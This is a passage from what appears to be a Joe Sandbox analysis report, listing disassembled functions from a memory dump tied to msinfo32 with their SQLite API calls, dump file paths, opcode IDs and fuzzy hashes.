                                                                                                                • Part of subcall function 61E09D7B: sqlite3_mutex_enter.SQLITE3 ref: 61E09D9A
                                                                                                              • sqlite3_free.SQLITE3 ref: 61E4B5F1
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000C.00000002.874603371.0000000061E01000.00000020.00000001.01000000.0000000C.sdmp, Offset: 61E00000, based on PE: true
                                                                                                              • Associated: 0000000C.00000002.874598082.0000000061E00000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874619896.0000000061E97000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874626124.0000000061E99000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874634821.0000000061EAB000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874641242.0000000061EAC000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874647132.0000000061EAF000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874652822.0000000061EB2000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874658816.0000000061EB3000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_12_2_61e00000_msinfo32.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: sqlite3_finalize$sqlite3_freesqlite3_mutex_enter$sqlite3_blob_closesqlite3_log
                                                                                                              • String ID:
                                                                                                              • API String ID: 4171551786-0
                                                                                                              • Opcode ID: 31c23276780681c3d6d1b50f574dcf78f66eaca6afa13cdf9ee811830f763be0
                                                                                                              • Instruction ID: 07bc6abe1096d2866b98eb2f39b5d9d8b6c8432b8d85de124926ca2ac33033d4
                                                                                                              • Opcode Fuzzy Hash: 31c23276780681c3d6d1b50f574dcf78f66eaca6afa13cdf9ee811830f763be0
                                                                                                              • Instruction Fuzzy Hash: A2012774604781CBCB04BF79D2C551CBBE4AF49388F51485DDC859B306E738E844CB56
                                                                                                              Function 61E36C15 Relevance: 16.1, APIs: 6, Strings: 3, Instructions: 341COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000C.00000002.874603371.0000000061E01000.00000020.00000001.01000000.0000000C.sdmp, Offset: 61E00000, based on PE: true
                                                                                                              • Associated: 0000000C.00000002.874598082.0000000061E00000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874619896.0000000061E97000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874626124.0000000061E99000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874634821.0000000061EAB000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874641242.0000000061EAC000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874647132.0000000061EAF000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874652822.0000000061EB2000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874658816.0000000061EB3000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_12_2_61e00000_msinfo32.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: false$null$true
                                                                                                              • API String ID: 0-2913297407
                                                                                                              • Opcode ID: ec00886dd8d55f5b8c2679672578346d1d3c55ae798dffeb1f3a0dff0ffdc389
                                                                                                              • Instruction ID: 785e607ed22103d9756b48336a4cfcdb541e396a3425bca8fe374b57ffabd4bf
                                                                                                              • Opcode Fuzzy Hash: ec00886dd8d55f5b8c2679672578346d1d3c55ae798dffeb1f3a0dff0ffdc389
                                                                                                              • Instruction Fuzzy Hash: 2AC1BC71E092A5CBDB05CFA8C48079DBBF2ABCE318F68C16AD8545B346C335DA46CB51
                                                                                                              Function 61E3B117 Relevance: 16.0, APIs: 4, Strings: 5, Instructions: 220COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • sqlite3_mprintf.SQLITE3 ref: 61E3B130
                                                                                                                • Part of subcall function 61E386AE: sqlite3_initialize.SQLITE3 ref: 61E386B4
                                                                                                                • Part of subcall function 61E386AE: sqlite3_vmprintf.SQLITE3 ref: 61E386CE
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000C.00000002.874603371.0000000061E01000.00000020.00000001.01000000.0000000C.sdmp, Offset: 61E00000, based on PE: true
                                                                                                              • Associated: 0000000C.00000002.874598082.0000000061E00000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874619896.0000000061E97000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874626124.0000000061E99000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874634821.0000000061EAB000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874641242.0000000061EAC000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874647132.0000000061EAF000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874652822.0000000061EB2000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874658816.0000000061EB3000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_12_2_61e00000_msinfo32.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: sqlite3_initializesqlite3_mprintfsqlite3_vmprintf
                                                                                                              • String ID: + $ NOT $ OR $"$(,)?
                                                                                                              • API String ID: 2841607023-154350868
                                                                                                              • Opcode ID: bbaeaa9a630041c8063dd85f0ed5015a9079f0c7562324cf87e981d5c3aa2003
                                                                                                              • Instruction ID: 47d49b7bc0bc43e75fa6e745fc7c8d045d865694c0d20ff2a41cb89e8db6fb12
                                                                                                              • Opcode Fuzzy Hash: bbaeaa9a630041c8063dd85f0ed5015a9079f0c7562324cf87e981d5c3aa2003
                                                                                                              • Instruction Fuzzy Hash: 01913670E08A668BDB11CFA8C48069DBBF1BFC9304F29C96DD856AB341D3B4D841CB91
                                                                                                              Function 61E23BBA Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 177COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000C.00000002.874603371.0000000061E01000.00000020.00000001.01000000.0000000C.sdmp, Offset: 61E00000, based on PE: true
                                                                                                              • Associated: 0000000C.00000002.874598082.0000000061E00000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874619896.0000000061E97000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874626124.0000000061E99000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874634821.0000000061EAB000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874641242.0000000061EAC000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874647132.0000000061EAF000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874652822.0000000061EB2000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874658816.0000000061EB3000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_12_2_61e00000_msinfo32.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: memcmpsqlite3_value_text$sqlite3_freesqlite3_result_textsqlite3_value_bytes
                                                                                                              • String ID: 4 a$8 a
                                                                                                              • API String ID: 3386002893-2265302218
                                                                                                              • Opcode ID: 183071af51a83a5c8b4894d1860be941e64690272338cb94e2f10fd71954eff1
                                                                                                              • Instruction ID: 11e7220eea39ca055193cf0bd74047336e0f3203b8fd5044c5c37acbfa6384cd
                                                                                                              • Opcode Fuzzy Hash: 183071af51a83a5c8b4894d1860be941e64690272338cb94e2f10fd71954eff1
                                                                                                              • Instruction Fuzzy Hash: AD61CC70A086598FDB04CFA9C1A069DBBF1AF8D314F25C56ED8A5AB391D731D841CF60
                                                                                                              Function 61E76A41 Relevance: 15.1, APIs: 10, Instructions: 121COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • sqlite3_malloc64.SQLITE3 ref: 61E76AB8
                                                                                                              • sqlite3_exec.SQLITE3 ref: 61E76AEB
                                                                                                              • sqlite3_free_table.SQLITE3 ref: 61E76B05
                                                                                                              • sqlite3_free.SQLITE3 ref: 61E76B19
                                                                                                              • sqlite3_mprintf.SQLITE3 ref: 61E76B2C
                                                                                                              • sqlite3_free.SQLITE3 ref: 61E76B39
                                                                                                              • sqlite3_free.SQLITE3 ref: 61E76B52
                                                                                                                • Part of subcall function 61E09D7B: sqlite3_mutex_enter.SQLITE3 ref: 61E09D9A
                                                                                                              • sqlite3_free_table.SQLITE3 ref: 61E76B67
                                                                                                                • Part of subcall function 61E09F3F: sqlite3_free.SQLITE3 ref: 61E09F6D
                                                                                                              • sqlite3_realloc64.SQLITE3 ref: 61E76B8B
                                                                                                              • sqlite3_free_table.SQLITE3 ref: 61E76B9D
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000C.00000002.874603371.0000000061E01000.00000020.00000001.01000000.0000000C.sdmp, Offset: 61E00000, based on PE: true
                                                                                                              • Associated: 0000000C.00000002.874598082.0000000061E00000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874619896.0000000061E97000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874626124.0000000061E99000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874634821.0000000061EAB000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874641242.0000000061EAC000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874647132.0000000061EAF000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874652822.0000000061EB2000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874658816.0000000061EB3000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_12_2_61e00000_msinfo32.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: sqlite3_free$sqlite3_free_table$sqlite3_execsqlite3_malloc64sqlite3_mprintfsqlite3_mutex_entersqlite3_realloc64
                                                                                                              • String ID:
                                                                                                              • API String ID: 3621699333-0
                                                                                                              • Opcode ID: b9bf63c97bd1f4c3ce4f169f9678c0823aa4b9ace88a8bc76ed9f476b3ff0ea0
                                                                                                              • Instruction ID: a31d80f40ce4691f7682058d39d3375a17b15435ec663d7de8bb6f0a1780a51d
                                                                                                              • Opcode Fuzzy Hash: b9bf63c97bd1f4c3ce4f169f9678c0823aa4b9ace88a8bc76ed9f476b3ff0ea0
                                                                                                              • Instruction Fuzzy Hash: 5951B0B09052999BFB10DFA5D5847AEBBF1FF89308F20842DE855AB350E778E841CB51
                                                                                                              Function 61E4B37A Relevance: 15.1, APIs: 10, Instructions: 51COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • sqlite3_finalize.SQLITE3 ref: 61E4B39A
                                                                                                                • Part of subcall function 61E49B16: sqlite3_log.SQLITE3 ref: 61E49B3A
                                                                                                              • sqlite3_finalize.SQLITE3 ref: 61E4B3A5
                                                                                                              • sqlite3_finalize.SQLITE3 ref: 61E4B3B0
                                                                                                                • Part of subcall function 61E49B16: sqlite3_mutex_enter.SQLITE3 ref: 61E49B59
                                                                                                              • sqlite3_finalize.SQLITE3 ref: 61E4B3BB
                                                                                                              • sqlite3_finalize.SQLITE3 ref: 61E4B3C6
                                                                                                              • sqlite3_finalize.SQLITE3 ref: 61E4B3D1
                                                                                                              • sqlite3_free.SQLITE3 ref: 61E4B3F2
                                                                                                              • sqlite3_free.SQLITE3 ref: 61E4B3EA
                                                                                                                • Part of subcall function 61E09D7B: sqlite3_mutex_enter.SQLITE3 ref: 61E09D9A
                                                                                                              • sqlite3_free.SQLITE3 ref: 61E4B3FD
                                                                                                              • sqlite3_free.SQLITE3 ref: 61E4B405
                                                                                                                • Part of subcall function 61E0A6C3: sqlite3_free.SQLITE3 ref: 61E0A6E6
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000C.00000002.874603371.0000000061E01000.00000020.00000001.01000000.0000000C.sdmp, Offset: 61E00000, based on PE: true
                                                                                                              • Associated: 0000000C.00000002.874598082.0000000061E00000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874619896.0000000061E97000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874626124.0000000061E99000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874634821.0000000061EAB000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874641242.0000000061EAC000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874647132.0000000061EAF000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874652822.0000000061EB2000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874658816.0000000061EB3000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_12_2_61e00000_msinfo32.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: sqlite3_finalize$sqlite3_free$sqlite3_mutex_enter$sqlite3_log
                                                                                                              • String ID:
                                                                                                              • API String ID: 3407354183-0
                                                                                                              • Opcode ID: c95f308797f9f875e1dc09b06be486209a7b996e6ce84896a68c23d7fd09836a
                                                                                                              • Instruction ID: 11eaf4a3a46c5d91cbcc96003081c66f23d45cf5420a2e8402439637498f3673
                                                                                                              • Opcode Fuzzy Hash: c95f308797f9f875e1dc09b06be486209a7b996e6ce84896a68c23d7fd09836a
                                                                                                              • Instruction Fuzzy Hash: 6111ED70A05A41CBCB00BFB9D6C542DBBE4EF48398B51886DDC86DB309FB34E8508B56
                                                                                                              Function 61E4B382 Relevance: 15.0, APIs: 10, Instructions: 47COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • sqlite3_finalize.SQLITE3 ref: 61E4B39A
                                                                                                                • Part of subcall function 61E49B16: sqlite3_log.SQLITE3 ref: 61E49B3A
                                                                                                              • sqlite3_finalize.SQLITE3 ref: 61E4B3A5
                                                                                                              • sqlite3_finalize.SQLITE3 ref: 61E4B3B0
                                                                                                                • Part of subcall function 61E49B16: sqlite3_mutex_enter.SQLITE3 ref: 61E49B59
                                                                                                              • sqlite3_finalize.SQLITE3 ref: 61E4B3BB
                                                                                                              • sqlite3_finalize.SQLITE3 ref: 61E4B3C6
                                                                                                              • sqlite3_finalize.SQLITE3 ref: 61E4B3D1
                                                                                                              • sqlite3_free.SQLITE3 ref: 61E4B3F2
                                                                                                              • sqlite3_free.SQLITE3 ref: 61E4B3EA
                                                                                                                • Part of subcall function 61E09D7B: sqlite3_mutex_enter.SQLITE3 ref: 61E09D9A
                                                                                                              • sqlite3_free.SQLITE3 ref: 61E4B3FD
                                                                                                              • sqlite3_free.SQLITE3 ref: 61E4B405
                                                                                                                • Part of subcall function 61E0A6C3: sqlite3_free.SQLITE3 ref: 61E0A6E6
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000C.00000002.874603371.0000000061E01000.00000020.00000001.01000000.0000000C.sdmp, Offset: 61E00000, based on PE: true
                                                                                                              • Associated: 0000000C.00000002.874598082.0000000061E00000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874619896.0000000061E97000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874626124.0000000061E99000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874634821.0000000061EAB000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874641242.0000000061EAC000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874647132.0000000061EAF000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874652822.0000000061EB2000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874658816.0000000061EB3000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_12_2_61e00000_msinfo32.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: sqlite3_finalize$sqlite3_free$sqlite3_mutex_enter$sqlite3_log
                                                                                                              • String ID:
                                                                                                              • API String ID: 3407354183-0
                                                                                                              • Opcode ID: 2b937f0c0430cef882df40a3fd1949f4fb9cde9fc13d25ebdbf70901825a91c9
                                                                                                              • Instruction ID: d3a17b4405393dd1554255f02e6228ec5f49064ac6db58b5df1881d8988ff7db
                                                                                                              • Opcode Fuzzy Hash: 2b937f0c0430cef882df40a3fd1949f4fb9cde9fc13d25ebdbf70901825a91c9
                                                                                                              • Instruction Fuzzy Hash: A201E970A05A41CBCB00BFB9D6C542DBBE4EF48398B51885DD8869B309E734E8908B56
                                                                                                              Function 61E01040 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 132sleepCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              Strings
                                                                                                              • aMingw-w64 runtime failure:, xrefs: 61E01135
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000C.00000002.874603371.0000000061E01000.00000020.00000001.01000000.0000000C.sdmp, Offset: 61E00000, based on PE: true
                                                                                                              • Associated: 0000000C.00000002.874598082.0000000061E00000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874619896.0000000061E97000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874626124.0000000061E99000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874634821.0000000061EAB000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874641242.0000000061EAC000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874647132.0000000061EAF000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874652822.0000000061EB2000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874658816.0000000061EB3000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_12_2_61e00000_msinfo32.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Sleep_amsg_exit
                                                                                                              • String ID: aMingw-w64 runtime failure:
                                                                                                              • API String ID: 1015461914-2267605977
                                                                                                              • Opcode ID: 784746dd14d881f30b9bf08806517fe3d65b9dc533a89e8da35f9ca8e054532c
                                                                                                              • Instruction ID: 5357f867adce077b21e3a730abdd35010c7a58fc21f38f91c1c1850d137b61fd
                                                                                                              • Opcode Fuzzy Hash: 784746dd14d881f30b9bf08806517fe3d65b9dc533a89e8da35f9ca8e054532c
                                                                                                              • Instruction Fuzzy Hash: 46417DB1A156858FEB00EFECD58030ABBF1EB86749F25C92DD4948B340D775D890CB92
                                                                                                              Function 61E1B066 Relevance: 13.9, APIs: 9, Instructions: 408COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000C.00000002.874603371.0000000061E01000.00000020.00000001.01000000.0000000C.sdmp, Offset: 61E00000, based on PE: true
                                                                                                              • Associated: 0000000C.00000002.874598082.0000000061E00000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874619896.0000000061E97000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874626124.0000000061E99000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874634821.0000000061EAB000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874641242.0000000061EAC000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874647132.0000000061EAF000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874652822.0000000061EB2000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874658816.0000000061EB3000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_12_2_61e00000_msinfo32.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: sqlite3_freesqlite3_malloc
                                                                                                              • String ID:
                                                                                                              • API String ID: 423083942-0
                                                                                                              • Opcode ID: 49174e7dc4fd2a43437ee9e43e1d601f2a912758486bf5e69f75efcc227c2f57
                                                                                                              • Instruction ID: 53468110379cb4b40cd279a8bbc4f62e3f72ac6a76d6d9d814a768d1b041425d
                                                                                                              • Opcode Fuzzy Hash: 49174e7dc4fd2a43437ee9e43e1d601f2a912758486bf5e69f75efcc227c2f57
                                                                                                              • Instruction Fuzzy Hash: 0002AD74E09219DFDB04CFA9D581A8EBBF2BF48314F25C159E854AB319E734E941CBA0
                                                                                                              Function 61E24779 Relevance: 13.8, APIs: 9, Instructions: 341COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • sqlite3_value_text.SQLITE3 ref: 61E24798
                                                                                                              • sqlite3_result_error_toobig.SQLITE3 ref: 61E24879
                                                                                                              • sqlite3_result_error_nomem.SQLITE3 ref: 61E2489F
                                                                                                              • sqlite3_snprintf.SQLITE3 ref: 61E24B1B
                                                                                                              • sqlite3_snprintf.SQLITE3 ref: 61E24B48
                                                                                                              • sqlite3_snprintf.SQLITE3 ref: 61E24B52
                                                                                                              • sqlite3_snprintf.SQLITE3 ref: 61E24BB8
                                                                                                              • sqlite3_result_text.SQLITE3 ref: 61E24CDB
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000C.00000002.874603371.0000000061E01000.00000020.00000001.01000000.0000000C.sdmp, Offset: 61E00000, based on PE: true
                                                                                                              • Associated: 0000000C.00000002.874598082.0000000061E00000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874619896.0000000061E97000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874626124.0000000061E99000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874634821.0000000061EAB000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874641242.0000000061EAC000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874647132.0000000061EAF000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874652822.0000000061EB2000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874658816.0000000061EB3000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_12_2_61e00000_msinfo32.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: sqlite3_snprintf$sqlite3_result_error_nomemsqlite3_result_error_toobigsqlite3_result_textsqlite3_value_text
                                                                                                              • String ID:
                                                                                                              • API String ID: 2444656285-0
                                                                                                              • Opcode ID: 07dbd272ad997125c7ae1a2431b4f8185bb58d95a436e0f8fdef9e5cccb8f40a
                                                                                                              • Instruction ID: d1b3bdb0ca97fac5e374d75c1642d618c2e1792f03280383bb8e899b0dca72cf
                                                                                                              • Opcode Fuzzy Hash: 07dbd272ad997125c7ae1a2431b4f8185bb58d95a436e0f8fdef9e5cccb8f40a
                                                                                                              • Instruction Fuzzy Hash: 53E1ADB594839ACFDB248F68C890799BBF0BF45304F25C49AE89867304D774D986CF46
                                                                                                              Function 61E24F46 Relevance: 13.7, APIs: 9, Instructions: 168COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000C.00000002.874603371.0000000061E01000.00000020.00000001.01000000.0000000C.sdmp, Offset: 61E00000, based on PE: true
                                                                                                              • Associated: 0000000C.00000002.874598082.0000000061E00000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874619896.0000000061E97000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874626124.0000000061E99000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874634821.0000000061EAB000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874641242.0000000061EAC000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874647132.0000000061EAF000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874652822.0000000061EB2000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874658816.0000000061EB3000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_12_2_61e00000_msinfo32.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: sqlite3_snprintf$sqlite3_result_textsqlite3_result_value
                                                                                                              • String ID:
                                                                                                              • API String ID: 336169149-0
                                                                                                              • Opcode ID: 2407c85179541031512b9ccba2fd9109f70c1473104af50b07cb5d3ee4b16225
                                                                                                              • Instruction ID: b75b49766d42a0e30cb1331acf14cca939e3120ed975abee86d7f71ff40e008a
                                                                                                              • Opcode Fuzzy Hash: 2407c85179541031512b9ccba2fd9109f70c1473104af50b07cb5d3ee4b16225
                                                                                                              • Instruction Fuzzy Hash: D961C07050C7868ED7119F68C9A479ABFE1AF86308F38C95DD4C84B39AD739C845CB42
                                                                                                              Function 61E35F6F Relevance: 13.6, APIs: 9, Instructions: 127COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000C.00000002.874603371.0000000061E01000.00000020.00000001.01000000.0000000C.sdmp, Offset: 61E00000, based on PE: true
                                                                                                              • Associated: 0000000C.00000002.874598082.0000000061E00000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874619896.0000000061E97000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874626124.0000000061E99000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874634821.0000000061EAB000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874641242.0000000061EAC000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874647132.0000000061EAF000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874652822.0000000061EB2000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874658816.0000000061EB3000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_12_2_61e00000_msinfo32.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: sqlite3_get_auxdata$memcmpsqlite3_freesqlite3_malloc64sqlite3_result_error_nomemsqlite3_set_auxdatasqlite3_value_bytessqlite3_value_text
                                                                                                              • String ID:
                                                                                                              • API String ID: 3041890313-0
                                                                                                              • Opcode ID: aad83ca8f24683031baccb80defc5f3506bb69eba3ac51206c710296cbfe7a77
                                                                                                              • Instruction ID: 00bdba995dc445a5c475eefd4ac47aec1461dc5a39379f9a9c4e96d0ff0fa20f
                                                                                                              • Opcode Fuzzy Hash: aad83ca8f24683031baccb80defc5f3506bb69eba3ac51206c710296cbfe7a77
                                                                                                              • Instruction Fuzzy Hash: A051B2B0A086658FDB50DFB9C58169EFBF1AB8C314F218569E858E7300E735D941CF51
                                                                                                              Function 61E32FFB Relevance: 12.6, APIs: 6, Strings: 1, Instructions: 366COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              Strings
